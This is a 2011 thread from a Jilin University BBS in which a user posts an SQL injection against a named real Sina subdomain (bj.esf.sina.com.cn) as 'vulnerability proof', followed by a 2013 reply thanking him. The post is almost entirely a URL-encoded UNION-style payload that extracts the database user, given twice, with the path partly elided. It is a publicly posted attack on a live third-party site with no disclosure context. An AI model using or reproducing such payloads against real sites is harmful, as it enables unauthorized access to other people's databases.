吉林大学北国之春BBS

标题: 新浪旁站的注入漏洞。。 [打印本页]

作者: 骑驴上高速    时间: 2011-7-10 15:20
标题: 新浪旁站的注入漏洞。。
http://bj.esf.sina.com.cn/news/n ... 6%BB%FA%B2%E9%D1%AF()%2C(select%20concat(0x2f,unhex(Hex(cast(user()%20as%20char)))))%2C30%2C31%2C32%2C33%2C34%2C35%2C6%2C5%2C4%2C3%2C2%23
漏洞证明:
http://bj.esf.sina.com.cn/news/n ... 6%BB%FA%B2%E9%D1%AF()%2C(select%20concat(0x2f,unhex(Hex(cast(user()%20as%20char)))))%2C30%2C31%2C32%2C33%2C34%2C35%2C6%2C5%2C4%2C3%2C2%23
作者: zju    时间: 2013-9-27 09:15
找到好贴不容易,我顶你了,谢了




欢迎光临 吉林大学北国之春BBS (http://jluol.com/) Powered by Discuz! X3.4